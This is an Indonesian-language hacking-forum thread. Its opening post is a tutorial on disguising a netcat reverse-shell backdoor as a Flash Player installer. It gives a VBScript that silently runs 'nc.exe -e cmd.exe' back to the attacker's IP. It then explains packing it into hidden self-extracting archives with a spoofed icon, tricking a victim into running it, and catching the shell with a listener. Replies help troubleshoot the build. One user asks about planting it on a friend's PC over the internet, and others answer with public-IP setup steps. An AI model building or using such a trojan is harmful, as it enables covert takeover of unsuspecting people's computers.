Remote windows dengan backdoor exe
#1
weleh-weleh … kembali lagi dah ketemu ama gw yang memang gk habis-habisnya berbagi demi kemajuan IT dan opensource Indonesia. Pada kesempatan ini gw mau ngeshare mengenai tehnik simple bagaimana mendapat akses remote shell di windows dengan fasilitas netcat di backtrack. Ok baca resepnya terlebih dahulu. Simplenya tutorial ini akan mengajarkan kita untuk menyisipkan program backdoor pada salah satu installer windows, sehingga akan membuka koneksi remot pada saat program terkontaminasi di esekusi oleh korban

Remote windows with netcat
======================

Target : windows xp1,xp2,xp3,win7,vista
Attacker : Linux Backtrack R2

need :
- Netcat windows version ( download here )
- Reshacker windows version ( download here )
- FlashPlayer Installer ( dalam hal ini ane memilih flash player untuk sample.. bisa ente gunakan exe yang lain )
- winrar ( windows version )
- Netcat Linux version ( included on backtrack R2 )
- Script NC-Remote

copas aja bro .. ane males jelasin cara kerja script ini Big Grin

Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)

Ok let we start ….

First Step

Ok pertama-tama edit script tadi pake notepad atau apa saja ganti kata-kata ip-ente dengan ip address pada komputer yang akan anda jadikan penyerang. simpan dengan nama zee.vbs

Code:
Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)

[Image: script.jpg]

Second Step

Siapkan Program NetCat yang sudah anda download terus bikin sfx archives di gabungkan dengan script yang sudah ente edit tadi ( zee.vbs )

[Image: rar1.jpg]

Pilih Advance SFX options tabs terus edit path to extract. Untuk kasus kali ini gw samplekan c:/ Hilangkan centang pada save & restore paths. Dan pada setup program ( run before extraction ) ketikan zee.vbs , agar setelah di extrak nanti zee.vbs akan langsung di esekusi pada path c:/

[Image: rar2.jpg]

Klik mode terus centang hide all

[Image: rar3.jpg0]

Kemudian esekusi rar nya …..

Third Step

klik run terus ketik di situ iexpress lalu enter …lalu tinggal next-next aja sampe nanti di minta untuk memasukan file-file apa saja yang mau di gabungkan dalam satu install self extraction pada windows.Jangan lupa untuk mencentang hiden proses untuk menipu target Big Grin . Simpan dengan extention exe

[Image: ie21.jpg]

Pembuatan self extraction selesai. Langkah terakhir kita ganti icon default dengan icon flash player installer dengan rest hacker.

[Image: res.jpg]

Ok file backdoor sudah ready. Terserah cara anda untuk memasukan file backdoor tadi ke komputer korban. Bisa lewat bujukan , download atau apa saja sesuai dengan kreasi ente Tongue

4th Step

Sekarang pada backtrack anda ketikan peritah di bawah ini untuk mengaktifkan nc
Code:
root@ibteam:~# nc -lvp 4444

Kita tinggal menunggu agar korban mengeklik backdoor yang sudah ente siapkan tadi …kalo sudah di klik .. sudah dapat di pastikan nc pada terminal akan memulai session remote

[Image: snapshot101.png?w=497&h=310]

heheheh kita berhasil mendapatkan shell akses.. selanjutnya terserah ente ..

kalo kurang2 ngerti penjelasan ane.. silahkan download video tutorial yang udah ane bikin di bawah ini

http://www.ziddu.com/download/14911011/n...r.rar.html

thx to Jesus Christ , all my friend at IBTeam, IHT , tecon

see u in next trick Big Grin D
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
ow jadi step pertama kita harus pake laptop korban dlu untuk tanem backdoornya...
< <

#3
" Pilih Advance SFX options tabs terus edit path to extract. Untuk kasus kali ini gw samplekan c:/ Hilangkan centang pada save & restore paths. Dan pada setup program ( run before extraction ) ketikan zee.vbs , agar setelah di extrak nanti zee.vbs akan langsung di esekusi pada path c:/ "

akang zee pas bagian ini kami gagal, file nc.exe nya ga mau masuk trus padahal NetCatna ambil dari link donlot akang :hammer

mohon pencerahanya :/

#4
liat videonya baik bro.. nc di situ harus di extrak keseluruhan.. jgn cuma nc.exe nya aja ..
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#5
Mantaf Ini, Kapan-Kapan Ares Coba Mastha
Ares TheHopeBuster
http://kurawa.id/ - Panglima Perangnya Indonesian BackTrack Team
Anarchy Penetration Testing!-,

#6
(06-03-2011, 10:42 PM)zee eichel Wrote: liat videonya baik bro.. nc di situ harus di extrak keseluruhan.. jgn cuma nc.exe nya aja ..


iya kang kami udah di ekstrack smuanya tapi pas di kompresin lg dengan sfx sama file zee.vbs itu nah si file nc.exe nya g mau ikut masuk :|

#7
para sobat ane mau nanya ni misal kan file backdoornya ud jadi trus ane mau pasang nih backdoor di kompi yg ada di rumah temen ane.. apakah bisa saya meremote dari kompi rumah saya ?? seperti TEAMVIEWER gitu hehehe...
eh 1 lagi masbro IP yg di masukin itu bisa IP publik ga kan mau ngeremote kompi orang laen dari jauh yg Tidak dalam 1 ruang lingkup LAN ? itu tuh yg di zee.vbs

#8
(07-06-2011, 07:42 PM)fandy90 Wrote: para sobat ane mau nanya ni misal kan file backdoornya ud jadi trus ane mau pasang nih backdoor di kompi yg ada di rumah temen ane.. apakah bisa saya meremote dari kompi rumah saya ?? seperti TEAMVIEWER gitu hehehe...
eh 1 lagi masbro IP yg di masukin itu bisa IP publik ga kan mau ngeremote kompi orang laen dari jauh yg Tidak dalam 1 ruang lingkup LAN ? itu tuh yg di zee.vbs

memang itu untuk remote bro..

untuk mendapatkan ip public di kompi klo make backtrack V

# pppoeconf

tinggal isi user ama pass klo memang dapet ip public ..

#9
(07-06-2011, 07:58 PM)micko Wrote: memang itu untuk remote bro..

untuk mendapatkan ip public di kompi klo make backtrack V

# pppoeconf

tinggal isi user ama pass klo memang dapet ip public ..

ane mau tnya lagi ni heheh gpp kan maklum msh pengguna baru Sad
itu Harus make backtrack V ya kk ane make backtrack 4 Sad
misal nih ane ud dapat IP publik di kompi ane dgn cara # pppoeconf
trus ane buat deh backdoor.exe lalu ane upload..trus kan di backtracknya di Set mode listening tuh nah kalau ada 2 kompi ato lebih yg sama2 mendownload lalu menjalankan backdoor yg saya buat itu nnti netcat yg ud di set listening itu masuk ke kompi yg mana ya ? hehehe
eh kk 1 lagi ni yg ane bingung "tinggal isi user ama pass klo memang dapet ip public" itu isi user ama passwordnya waktu kita ud mau masuk ke kompi target or kita masukkan IP publik ane ke dalam script zee.vbs ?

maklumin ya kk pertanyaannya bnyk soalnya ane msh pengguna baru bgt >.< baru pengen belajar ehhehe

#10
bisa 2 yang kebuka bro ..

pass pppoe teken2 ok ok aja ampe di minta user name ama passoword ..isikan user name isp dan password ..
nah terus ifconfig .. ntar jadi kek gini seperti punya ane ,,

eth0 Link encap:Ethernet HWaddr 00:15:f2:a6:cc:dc
inet6 addr: fe80::215:f2ff:fea6:ccdc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:41040 errors:0 dropped:0 overruns:0 frame:0
TX packets:40722 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:36193771 (36.1 MB) TX bytes:13718117 (13.7 MB)
Interrupt:20 Base address:0xe800

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:280 errors:0 dropped:0 overruns:0 frame:0
TX packets:280 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:14000 (14.0 KB) TX bytes:14000 (14.0 KB)

ppp0 Link encapTongueoint-to-Point Protocol
inet addr:125.161.215.xxx P-t-P:125.161.xx8.1 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1492 Metric:1
RX packets:40595 errors:0 dropped:0 overruns:0 frame:0
TX packets:40267 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:35270563 (35.2 MB) TX bytes:12818440 (12.8 MB)

perhatikan pada konesi baru ppp0 .. ane dapet ip public di kompi ane.. dan jgn lupa modem di setting mode bridge dulu..

FOLLOW @DutaLinux
for more question and sharing about security and Opensource only






Users browsing this thread: 1 Guest(s)